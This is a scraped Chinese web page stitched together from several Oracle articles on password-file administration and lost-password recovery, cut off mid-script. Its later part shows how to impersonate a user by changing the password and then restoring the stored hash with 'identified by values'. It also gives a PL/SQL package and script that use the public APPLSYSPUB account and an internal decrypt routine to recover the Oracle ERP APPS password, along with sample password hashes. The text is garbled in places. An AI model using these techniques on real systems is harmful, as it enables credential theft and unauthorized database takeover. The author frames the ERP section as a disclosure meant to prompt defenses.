Oracle密码文件的使用及其维护

Oracle密码文件的使用和维护【大 中 小】【打印】【加入收藏】【关闭】 【收藏到新浪ViVi】【收藏到365KEY】 浏览字号:日期：2004-11-08 人气： 1743 出处： 概要：Oracle关系数据库系统以其卓越的性能获得了广泛的应用，而保证数据库的安全性是数据库管理工作的重要内容。本文是笔者在总结Oracle数据库安全管理工作的基础上，对Oracle数据库系统密码文件的创建、使用和维护作了详细的介绍，供大家参考。 在Oracle数据库系统中，用户如果要以特权用户身份（INTERNALSYSDBASYSOPER）登录Oracle数据库可以有两种身份验证的方法：即使用与操作系统集成的身份验证或使用Oracle数据库的密码文件进行身份验证。因此，管理好密码文件，对于控制授权用户从远端或本机登录Oracle数据库系统，执行数据库管理工作，具有重要的意义。 Oracle数据库的密码文件存放有超级用户INTERNALSYS的口令及其他特权用户的用户名口令，它一般存放在ORACLE_HOMEDATABASE目录下。 一、密码文件的创建： 在使用Oracle Instance Manager创建一数据库实例的时侯，在ORACLE_HOMEDATABASE目录下还自动创建了一个与之对应的密码文件，文件名为PWDSID.ORA，其中SID代表相应的Oracle数据库系统标识符。此密码文件是进行初始数据库管理工作的基础。在此之后，管理员也可以根据需要，使用工具ORAPWD.EXE手工创建密码文件，命令格式如下： C: ORAPWDFILE= FILENAME PASSWORD = PASSWORD ENTRIES= 各命令参数的含义为： FILENAME：密码文件名； PASSWORD：设置INTERNALSYS帐号的口令； MAX_USERS：密码文件中可以存放的最大用户数，对应于允许以SYSDBASYSOPER权限登录数据库的最大用户数。由于在以后的维护中，若用户数超出了此限制，则需要重建密码文件，所以此参数可以根据需要设置得大一些。 有了密码文件之后，需要设置初始化参数REMOTE_LOGIN_PASSWORDFILE来控制密码文件的使用状态。二、设置初始化参数REMOTE_LOGIN_PASSWORDFILE： 在Oracle数据库实例的初始化参数文件中，此参数控制着密码文件的使用及其状态。它可以有以下几个选项：NONE：指示Oracle系统不使用密码文件，特权用户的登录通过操作系统进行身份验证； EXCLUSIVE：指示只有一个数据库实例可以使用此密码文件。只有在此设置下的密码文件可以包含有除INTERNALSYS以外的用户信息，即允许将系统权限SYSOPERSYSDBA授予除INTERNALSYS以外的其他用户。 SHARED：指示可有多个数据库实例可以使用此密码文件。在此设置下只有INTERNALSYS帐号能被密码文件识别，即使文件中存有其他用户的信息，也不允许他们以SYSOPERSYSDBA的权限登录。此设置为缺省值。 在REMOTE_LOGIN_PASSWORDFILE参数设置为EXCLUSIVE、SHARED情况下，Oracle系统搜索密码文件的次序为：在系统注册库中查找ORA_SID_PWFILE参数值（它为密码文件的全路径名）；若未找到，则查找ORA_PWFILE参数值；若仍未找到，则使用缺省值ORACLE_HOMEDATABASEPWDSID.ORA；其中的SID代表相应的Oracle数据库系统标识符。 三、向密码文件中增加、删除用户： 当初始化参数REMOTE_LOGIN_PASSWORDFILE设置为EXCLUSIVE时，系统允许除INTERNALSYS以外的其他用户以管理员身份从远端或本机登录到Oracle数据库系统，执行数据库管理工作；这些用户名必须存在于密码文件中，系统才能识别他们。由于不管是在创建数据库实例时自动创建的密码文件，还是使用工具ORAPWD.EXE手工创建的密码文件，都只包含INTERNALSYS用户的信息；为此，在实际操作中，可能需要向密码文件添加或删除其他用户帐号。 由于仅被授予SYSOPERSYSDBA系统权限的用户才存在于密码文件中，所以当向某一用户授予或收回SYSOPERSYSDBA系统权限时，他们的帐号也将相应地被加入到密码文件或从密码文件中删除。由此，向密码文件中增加或删除某一用户，实际上也就是对某一用户授予或收回SYSOPERSYSDBA系统权限。 要进行此项授权操作，需使用SYSDBA权限（或INTERNAL帐号）连入数据库，且初始化参数REMOTE_LOGIN_PASSWORDFILE的设置必须为EXCLUSIVE。具体操作步骤如下： 创建相应的密码文件； 设置初始化参数REMOTE_LOGIN_PASSWORDFILEEXCLUSIVE； 使用SYSDBA权限登录： CONNECTSYSinternal_user_passswordASSYSDBA； 启动数据库实例并打开数据库； 创建相应用户帐号，对其授权（包括SYSOPER和SYSDBA）： 授予权限：GRANTSYSDBATOuser_name； 收回权限：REVOKESYSDBAFROMuser_name； 现在这些用户可以以管理员身份登录数据库系统了；四、使用密码文件登录： 有了密码文件后，用户就可以使用密码文件以SYSOPERSYSDBA权限登录Oracle数据库实例了，注意初始化参数REMOTE_LOGIN_PASSWORDFILE应设置为EXCLUSIVE或SHARED。任何用户以SYSOPERSYSDBA的权限登录后，将位于SYS用户的Schema之下，以下为两个登录的例子： 1.以管理员身份登录： 假设用户scott已被授予SYSDBA权限，则他可以使用以下命令登录： CONNECTscotttigerASSYSDBA 2.以INTERNAL身份登录： CONNECTINTERNALINTERNAL_PASSWORD 五、密码文件的维护： 1.查看密码文件中的成员： 可以通过查询视图V$PWFILE_USERS来获取拥有SYSOPERSYSDBA系统权限的用户的信息，表中SYSOPERSYSDBA列的取值TRUEFALSE表示此用户是否拥有相应的权限。这些用户也就是相应地存在于密码文件中的成员。 2.扩展密码文件的用户数量： 当向密码文件添加的帐号数目超过创建密码文件时所定的限制（即ORAPWD.EXE工具的MAX_USERS参数）时，为扩展密码文件的用户数限制，需重建密码文件，具体步骤如下： a)查询视图V$PWFILE_USERS，记录下拥有SYSOPERSYSDBA系统权限的用户信息； b)关闭数据库； c)删除密码文件； d)用ORAPWD.EXE新建一密码文件； e)将步骤a中获取的用户添加到密码文件中。 3.修改密码文件的状态： 密码文件的状态信息存放于此文件中，当它被创建时，它的缺省状态为SHARED。可以通过改变初始化参数REMOTE_LOGIN_PASSWORDFILE的设置改变密码文件的状态。当启动数据库事例时，Oracle系统从初始化参数文件中读取REMOTE_LOGIN_PASSWORDFILE参数的设置；当加载数据库时，系统将此参数与口令文件的状态进行比较，如果不同，则更新密码文件的状态。若计划允许从多台客户机上启动数据库实例，由于各客户机上必须有初始化参数文件，所以应确保各客户机上的初始化参数文件的一致性，以避免意外地改变了密码文件的状态，造成数据库登陆的失败。 4.修改密码文件的存储位置： 密码文件的存放位置可以根据需要进行移动，但作此修改后，应相应修改系统注册库有关指向密码文件存放位置的参数或环境变量的设置。 5.删除密码文件： 在删除密码文件前,应确保当前运行的各数据库实例的初始化参数REMOTE_LOGIN_PASSWORDFILE皆设置为NONE。在删除密码文件后，若想要以管理员身份连入数据库的话，则必须使用操作系统验证的方法进行登录详细讲述 Oracle 密码丢失解决方法作者：佚名来源：不详点击数： 72更新时间：2007年05月05日在使用Oracle过各中经常会遇到密码丢失的时候，本文用两种试来解决这个问题。 一种方法: sqlplus / as sysdbaSQLstartupSQLalter user system identified by root123;如果sqlplus / as sysdba不能进入,让输入密码,我输入原始密码和修改的密码后都不行的话,修改unix环境下: 1. $ORACLE_HOMEnetworkadminSQLNET.ORA中为： SQLNET.AUTHENTICATION_SERVICES=(NTS) 重起数据库/监听服务，就可以用操作系统认证sqlplus / as sysdba了,来进入你的数据库，从而轻而易举的搞定你的数据库了。 2. sqlplus /nolog sqlconnect /as sysdba第二种方法: 详细步骤如下： 一：查询视图V$PWFILE_USERS：select * from V$PWFILE_USERS；记录下拥有 SYSOPERSYSDBA系统权限的用户信息。 二：关闭数据库 shutdown immediate。 三：删除密码文件，文件路径一般为：ORACLE_HOMEDATABASE，文件名为PWD.ORA。 四：创建密码文件： ORAPWDFILE= FILENAME PASSWORD = PASSWORD 五：向密码文件中增加用户： CONNECTSYSinternal_user_passsword ASSYSDBA； 启动数据库实例并打开数据库； 创建相应用户帐号，对其授权授予 权限：GRANTSYSDBATO user_name（如果先前数据库只有sys具有sysdba权限，可不做这步）。 六：修改密码文件状态，默认密码文件的状态shared，要将初始化参数里的REMOTE_LOGIN_PASSWORDFILE 设置成EXCLUSIVE。（T006） 个修改Oracle用户密码的小诀窍 数据库版本：有时候我们可能不知道一个用户的密码，但是又需要以这个用户做一些操作，又不能去修改掉这个用户的密码，这个时候，就可以利用一些小窍门，来完成操作。具体操作过程如下：SQL*Plus: Release .0 - Production on 星期日 11月 21 13:32:34 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.SQL connect sys/oracle as sysdba已连接。SQL select username,password from dba_users;USERNAME PASSWORD- -SYS 8A8F025737A9097ASYSTEM 2D594E86F93B17A1DBSNMP E066D214D5421CCCTOAD A1BA01CF0DD82695OUTLN 4A3BA55E08595C81WMSYS 7C9BA362F8314299已选择6行。SQL connect system/oracle已连接。SQL connect sys/oracle as sysdba已连接。修改用户system密码为managerSQL alter user system identified by manager;用户已更改。SQL select username,password from dba_users;USERNAME PASSWORD- -SYS 8A8F025737A9097ASYSTEM D4DF7931AB130E37DBSNMP E066D214D5421CCCTOAD A1BA01CF0DD82695OUTLN 4A3BA55E08595C81WMSYS 7C9BA362F8314299已选择6行。SQL connect system/manager已连接。然后此时可以做想要做的任何操作了SQL connect sys/oracle as sysdba已连接。修改用户system密码为以前的值SQL alter user system identified by values 2D594E86F93B17A1;用户已更改。SQL connect system/oracle已连接。SQL connect sys/oracle as sysdba已连接。SQL connect system/managerERROR:ORA-01017: invalid username/password; logon denied警告: 您不再连接到 ORACLE。Oracle中password file的作用及说明作者：eygle | English Version 【版权声明：转载时请务必以超链接形式标明文章原始出处和作者信息及本声明】链接：/archives/2004/06/passwordfile.html 站内相关文章|Related Articles Oracle与Linux/Unix下的时间处理 Oracle ACE China的一个小小聚会 2006 中国ERP市场谁主沉浮? 2006年Q3中国数据库市场 Oracle再占首位 如何更改监听器日志文件名称在数据库没有启动之前，数据库内建用户是无法通过数据库来验证身份的口令文件中存放sysdba/sysoper用户的用户名及口令允许用户通过口令文件验证，在数据库未启动之前登陆从而启动数据库如果没有口令文件，在数据库未启动之前就只能通过操作系统认证.使用Rman，很多时候需要在nomount,mount等状态对数据库进行处理所以通常要求sysdba权限如果属于本地DBA组，可以通过操作系统认证登陆如果是远程sysdba登陆，需要通过passwordfile认证.1.remote_login_passwordfile = NONE此时停用口令文件验证，Oracle数据库不允许远程SYSDBA/SYSOPER身份登录无法通过远程进行数据库起停等操作管理local:oraclejumper oracle$ sqlplus / as sysdbaSQL*Plus: Release .0 - Production on Thu Apr 15 09:58:45 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.Connected to:Oracle9i Enterprise Edition Release .0 - ProductionWith the Partitioning, OLAP and Oracle Data Mining optionsJServer Release .0 - ProductionSQL alter user sys identified by oracle;User altered.SQL show parameter passNAME TYPE VALUE- - -remote_login_passwordfile string NONE remote:E:Oracleora92binsqlplus /nologSQL*Plus: Release .0 - Production on 星期四 4月 15 09:39:22 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.SQL connect sys/oraclehsjf as sysdbaERROR:ORA-01017: invalid username/password; logon denied此处实际上是无法通过口令文件验证2.remote_login_passwordfile = exclusiveSQL alter system set remote_login_passwordfile=exclusive scope=spfile;System altered.SQL startup force;ORACLE instance started.Total System Global Area 131142648 bytesFixed Size 451576 bytesVariable Size 104857600 bytesDatabase Buffers 25165824 bytesRedo Buffers 667648 bytesDatabase mounted.Database opened.SQL show parameter passNAME TYPE VALUE- - -remote_login_passwordfile string EXCLUSIVESQL alter user sys identified by oracle;User altered.remote: E:Oracleora92binsqlplus /nologSQL*Plus: Release .0 - Production on 星期四 4月 15 09:47:11 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.SQL connect sys/oraclehsjf as sysdba已连接。SQL show userUSER 为SYSSQL这实际上就是通过口令文件验证登录的 3.进一步测试如果此时我们删除passwdfile,sysdba/sysoper将无法认证，也就无法登陆数据库Server: SQL !oraclejumper oracle$ cd $ORACLE_HOME/dbsoraclejumper dbs$ ls orapwhsjforapwhsjforaclejumper dbs$ mv orapwhsjf orapwhsjf.bakoraclejumper dbs$ Remote: E:Oracleora92binsqlplus /nologSQL*Plus: Release .0 - Production on 星期四 4月 15 09:50:14 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.SQL connect sys/oraclehsjf as sysdbaERROR:ORA-01031: insufficient privilegesSQL这实际上就是无法通过口令文件验证身份4.如果丢失了passwdfile如果使用passwdfile却意外丢失，此时将不能启动数据库SQL startup force;ORACLE instance started.Total System Global Area 131142648 bytesFixed Size 451576 bytesVariable Size 104857600 bytesDatabase Buffers 25165824 bytesRedo Buffers 667648 bytesORA-01990: error opening password file /opt/oracle/product/9.2.0/dbs/orapwORA-27037: unable to obtain file statusLinux Error: 2: No such file or directoryAdditional information: 3此时可以通过orapwd重建口令文件来解决此处我们恢复口令文件既可SQL !oraclejumper oracle$ mv $ORACLE_HOME/dbs/orapwhsjf.bak orapwhsjforaclejumper oracle$ exitexitSQL alter database open;Database altered.SQL 大致就是如此.5. remote_login_passwordfile = shared我们看一下Oracle9i文档中的说明:SHARED More than one database can use a password file. However, the only user recognized by the password file is SYS.意思是说多个数据库可以共享一个口令文件,但是只可以识别一个用户:SYSSQL select * from v$pwfile_users;USERNAME SYSDB SYSOP- - -SYS TRUE TRUESQL grant sysdba to eygle;grant sysdba to eygle*ERROR at line 1:ORA-01994: GRANT failed: cannot add users to public password fileSQL show parameter passwordNAME TYPE VALUE- - -remote_login_passwordfile string SHARED我们看到,此时的口令文件中是不能添加用户的.很多人的疑问在于:口令文件的缺省名称是orapw,怎么能够共享? 实际上是这样的: Oracle数据库在启动时,首先查找的是orapw的口令文件,如果该文件不存在,则开始查找,orapw的口令文件如果口令文件命名为orapw,多个数据库就可以共享.我们看一下测试:oraclejumper dbs$ sqlplus / as sysdbaSQL*Plus: Release .0 - Production on Tue Jul 6 09:40:34 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.Connected to:Oracle9i Enterprise Edition Release .0 - ProductionWith the Partitioning, OLAP and Oracle Data Mining optionsJServer Release .0 - ProductionSQL shutdown immediateDatabase closed.Database dismounted.ORACLE instance shut down.SQL !oraclejumper dbs$ lshsjf initdw.ora inithsjf.ora init.ora lkHSJF orapwhsjf spfilehsjf.oraoraclejumper dbs$ mv orapwhsjf orapwhsjf.bakoraclejumper dbs$ exitexitSQL startupORACLE instance started.Total System Global Area 235999908 bytesFixed Size 451236 bytesVariable Size 201326592 bytesDatabase Buffers 33554432 bytesRedo Buffers 667648 bytesORA-01990: error opening password file /opt/oracle/product/9.2.0/dbs/orapw-这是最后查找的文件ORA-27037: unable to obtain file statusLinux Error: 2: No such file or directoryAdditional information: 3 我们建立orapw口令文件,这时候可以打开数据库.SQL !oraclejumper dbs$ lshsjf initdw.ora inithsjf.ora init.ora lkHSJF orapwhsjf.bak spfilehsjf.oraoraclejumper dbs$ cp orapwhsjf.bak orapworaclejumper dbs$ exitexitSQL alter database open;Database altered.SQL show parameter passwNAME TYPE VALUE- - -remote_login_passwordfile string SHAREDSQL 那么你可能会有这样的疑问,多个Exclusive的数据库是否可以共享一个口令文件(orapw)呢?我们继续这个实验:SQL show parameter passwordNAME TYPE VALUE- - -remote_login_passwordfile string SHAREDoraclejumper dbs$ strings orapwZORACLE Remote Password fileINTERNALAB27B53EDC5FEF418A8F025737A9097A注意这里仅记录着INTERNAL/SYS的口令REMOTE_LOGIN_PASSWORDFILE=EXCLUSIVE 时SQL alter system set remote_login_passwordfile=exclusive scope=spfile;System altered.SQL startup force;ORACLE instance started.Total System Global Area 235999908 bytesFixed Size 451236 bytesVariable Size 201326592 bytesDatabase Buffers 33554432 bytesRedo Buffers 667648 bytesDatabase mounted.Database opened.SQL !oraclejumper bin$ cd $ORACLE_HOME/dbsoraclejumper dbs$ strings orapwZORACLE Remote Password fileHSJFINTERNALAB27B53EDC5FEF418A8F025737A9097Aoraclejumper dbs$ exitexit注意这里,以EXCLUSIVE 方式启动以后,实例名称信息被写入口令文件.此时如果有其他实例以Exclusive模式启动仍然可以使用这个口令文件,口令文件中的实例名称同时被改写.也就是说,数据库只在启动过程中才读取口令文件,数据库运行过程中并不锁定该文件,类似于pfile/spfile文件.SQL select * from v$pwfile_users;USERNAME SYSDB SYSOP- - -SYS TRUE TRUESQL grant sysdba to eygle;Grant succeeded.SQL select * from v$pwfile_users;USERNAME SYSDB SYSOP- - -SYS TRUE TRUEEYGLE TRUE FALSESQL !oraclejumper bin$ cd $ORACLE_HOME/dbsoraclejumper dbs$ strings orapwZORACLE Remote Password fileHSJFINTERNALAB27B53EDC5FEF418A8F025737A9097AEYGLEB726E09FE21F8E83注意此时可以增加SYSDBA用户，并且这些信息可以被写入到口令文件.一旦口令文件中增加了其他SYSDBA用户,此文件不再能够被其他Exclusive的实例共享.实际上，口令文件对于其他用户来说就是启到了一个 sudo 的作用.6.重建口令文件如果口令文件丢失,可以使用orapwd可以重建口令文件，语法如下:oraclejumper oracle$ orapwdUsage: orapwd file= password= entries= wherefile - name of password file (mand),password - password for SYS (mand),entries - maximum number of distinct DBA and OPERs (opt), There are no spaces around the equal-to (=) character. 破解Oracle一般用户的口令itlab推出人才网，2万IT职位热聘中杭州朗元无线通信技术高级ORACLE DBA北京华安天诚科技有限公司数据库工程师 索尼数码相机报价大全网校推荐课程 Web2.0创业宝典网校推荐课程 2007 新版CCNP课程5.0 ChinaITLab 收集整理 2004-11-17 保存本文 推荐给好友 收藏本站 我现在用一个系统(GeoMedia),他有一个自建的用户(GDOSYS)，谁能告诉我怎么知道这个用户的口令呢.从以上对话中得知，估计程序里面有了用户名和密码的语句，你可以通过这招修改密码，然后修改数据，在把密码改回去-FROMWWW.ORADB.NET贴来的如何取出某一用户的密码，再原封不动的改回去？软件环境：1、WindowsNT4.0+ORACLE8.0.42、ORACLE安装路径为：C:ORANT实现方法：SQLconnsystem/managerSQLselectpasswordfromdba_userswhereusername=USER1;(用户名一定要用大写)结果：1F8E5A929B6861AC(这就是此用户的密码)SQLalteruserUSER1identifiedbyaaa;(改变此用户的密码为aaa)SQLconnuser1/aaa(连接到用户上，？)SQL执行你想要的操作.SQLconnsystem/managerSQLalteruserUSER1identifiedbyvalues1F8E5A929B6861AC;(改回原有密码)破解Oracle ERP 密码1. 写作目的在要不要写出来让大家知道这个问题上想了很久, 但一想到迟早密码破解的方法还是会被人知道的,与其让少部分人知道,还不如让大家都知道,事先好作防范. 公布密码破解方法的目的还是想让Oracle ERP做得更安全一点,让我们大家放心的去用,毕竟是几千万的东西,现在的安全性显然还达不到用户的要求. 想借大家的力量给Oracle施加一点压力,以将Oracle ERP的各个版本改得安全一点.2. 利用Toad或其它pl/sql工具在Oracle ERP Database中建立Package,源码如下(1).建立Package HeaderCREATE OR REPLACE PACKAGE CrackPwd AUTHID CURRENT_USERAS FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2) RETURN VARCHAR2;END CrackPwd;(2).建立Package BodyCREATE OR REPLACE PACKAGE BODY CrackPwdAS FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2) RETURN VARCHAR2 AS LANGUAGE JAVA NAME oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String;END CrackPwd;/3. 取得APPS密码的步骤假设现在什么Oracle erp权限都没有,怎么去知道oracle erp databaes的权限呢? 我们知道Oracle erp提供了一个database的公用账户(gateway user),此账户拥有database的最小权限,这个公用账号是: APPLSYSPUB/PUB(oracle erp网页中或URL中都有公开此账户),虽然此账户没有什么权限,但却有FND_USER_VIEW 的查询权限,通过这个view可以看到erp中所有的user和其ENCRYPED_FOUNDATION_PASSWORD字段,问题就出在这个view的ENCRYPED_FOUNDATION_PASSWORD字段上, ENCRYPED_FOUNDATION_PASSWORD这个字段是由APPS的密码和用户密码一起通过加密算法得出的结果, 因此只要知道Oracle ERP的解密算法就可以通过fnd_user中任何一个user的password反查apps的密码.,而要知道fnd_user中任何一个user的密码是太简单的事了,在erp安装时就预设了很多账户,这些账户的user name和password都是一样的,一般没有人去改这些账户的密码4. 通过任何一个User name/password取得APPS密码的方法SET SERVEROUTPUT ONDECLAREguestUserPwd VARCHAR2(200);guestUserName VARCHAR2(100);guestFndPwd VARCHAR2(100);guestEncFndPwd VARCHAR2(100);delim NUMBER;BEGINguestUserPwd :=GUEST/ORACLE;-Can any user passwordIFguestUserPwd IS NULL THEN guestUserPwd := UPPER(fnd_profile.value(GUEST_USER_PWD);END IF;delim := INSTR(guestUserPwd,/);guestUserName := UPPER(SUBSTR(guestUserPwd,1,delim-1); SELECT encrypted_foundation_password INTO guestEncFndPwdFROM fnd_user_viewWHERE user_name = guestUserName AND (start_date <= SYSDATE) AND (end_date IS NULL OR end_date > SYSDATE); guestFndPwd :=CrackPwd.getpwd(guestUserPwd,guestEncFndPwd); IF NOT (guestFndPwd IS NULL) THEN DBMS_OUTPUT.put_line(guestFndPwd); END IF; END;注: guestUserPwd :=GUEST/ORACLE;-Can any user password 上面这一行可以改成任何一个User的username/password,账号和密码之间用”/”隔开以上程序可以用toad执行5. 通过FND_USER:ENCRYPTED_USER_PASSWORD取得明文密码的方法SET SERVEROUT ONDECLARE v_encrypted_pwd VARCHAR2